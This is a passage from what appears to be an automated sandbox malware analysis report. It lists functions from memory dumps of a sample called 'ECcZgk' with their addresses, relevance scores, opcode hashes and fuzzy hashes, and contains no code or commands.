                        • Opcode ID: 278ffa872b09e1dbd4670541c27aaa88f85ded1a666d4ae5f578c055706304c2
                        • Instruction ID: 64c22fcee0e1d838ee19c84dde1aae82e0f15ff615ec4d40246f6cd156dbcc60
                        • Opcode Fuzzy Hash: 278ffa872b09e1dbd4670541c27aaa88f85ded1a666d4ae5f578c055706304c2
                        • Instruction Fuzzy Hash: B021C7B1905240DFDF15EF54D9C0B1BBFA5FB88314F24C56AE9490A2A6C336D417CB61
                        Function 0149D4A4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2313646570.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_149d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 30ca27b687223c5aa0c0360f908c4a9f540c629dcdc44cfd3fb211c75f1f8443
                        • Instruction ID: cd811cb388d57e6971c3fbb6b4304cffd1d0da49e9f2890cd81ba370cb1f1b94
                        • Opcode Fuzzy Hash: 30ca27b687223c5aa0c0360f908c4a9f540c629dcdc44cfd3fb211c75f1f8443
                        • Instruction Fuzzy Hash: D721D0B1904244EFDF05CF58D9C0B26BFA5EB84328F24C56ED90A4B362C73AE406CB61
                        Function 0149D2F4 Relevance: .1, Instructions: 72COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2313646570.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_149d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b15764fb8470bf088fb59a57e15f385f709df48f067696df60102eb3cb330d4e
                        • Instruction ID: d55e59590f0eac1f6e78922eef91b3b5fcc38653a9f36b1b1f87ea9a347f581b
                        • Opcode Fuzzy Hash: b15764fb8470bf088fb59a57e15f385f709df48f067696df60102eb3cb330d4e
                        • Instruction Fuzzy Hash: F82108B1A04244EFDF21DF98D9C0B2ABF65FB84315F24C56ED8494B356C37AD406CAA1
                        Function 0148D04F Relevance: .1, Instructions: 58COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2313541799.000000000148D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0148D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_148d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 235392520c3f1e7e09b6d89c66da8016760e9a9590b2b0d78f6be887e7f5212d
                        • Instruction ID: b0e65f6d1480149b2288c012ebf5c10915f23ff1d44da98a53a013315f35afda
                        • Opcode Fuzzy Hash: 235392520c3f1e7e09b6d89c66da8016760e9a9590b2b0d78f6be887e7f5212d
                        • Instruction Fuzzy Hash: 6D21C072804280DFCF06DF44D9C4B1ABF72FF88314F2482AAD9480A267C33AD426CB91
                        Function 0149D49F Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2313646570.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_149d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction ID: 93e60265fa29c12c18bb7522d09b76d9d764325f4e652694b0bae063e7f77c33
                        • Opcode Fuzzy Hash: 5ecdbd2196c02b2d36a90ebf2b22d30fffd8b7da1097997a33617a95b9f44a3d
                        • Instruction Fuzzy Hash: F211D075904240CFDF02CF58D5C4B16BF61FB84328F24C6AAD9494B762C33AD40ACB51
                        Function 0149D2EF Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2313646570.000000000149D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0149D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_149d000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1d83059ff187c22e3bca89aa6d0a7c180522d0170c37a0a04a994941a968178a
                        • Instruction ID: 66db933a0ff50bb88c88b0ee3df89b94fe36cb9f80728f4bef448fa12716fc0f
                        • Opcode Fuzzy Hash: 1d83059ff187c22e3bca89aa6d0a7c180522d0170c37a0a04a994941a968178a
                        • Instruction Fuzzy Hash: 5911BF76904280CFDB12CF54D5C4B1AFF61FB84324F24C6AAD8494B756C33AD41ACBA2

                        Non-executed Functions

                        Function 06B10D50 Relevance: 10.3, Strings: 8, Instructions: 298COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 0000000E.00000002.2333127620.0000000006B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B10000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_14_2_6b10000_ECcZgk.jbxd
                        Similarity
                        • API ID:
                        • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                        • API String ID: 0-1273862796
                        • Opcode ID: d0cda932be88da2642a7557c9bebc30e23f53033a0ea5168469c920f1a46dc6b
                        • Instruction ID: 92eb56b4bf6407c42e02490cb2ea9001872c6429c6941e798a93dd91cfaab699
                        • Opcode Fuzzy Hash: d0cda932be88da2642a7557c9bebc30e23f53033a0ea5168469c920f1a46dc6b
                        • Instruction Fuzzy Hash: 46B1C270B00245AFCB54DB69C8549AEBBF6FF89301B5484AAE416CB3A1CF35DC41CBA1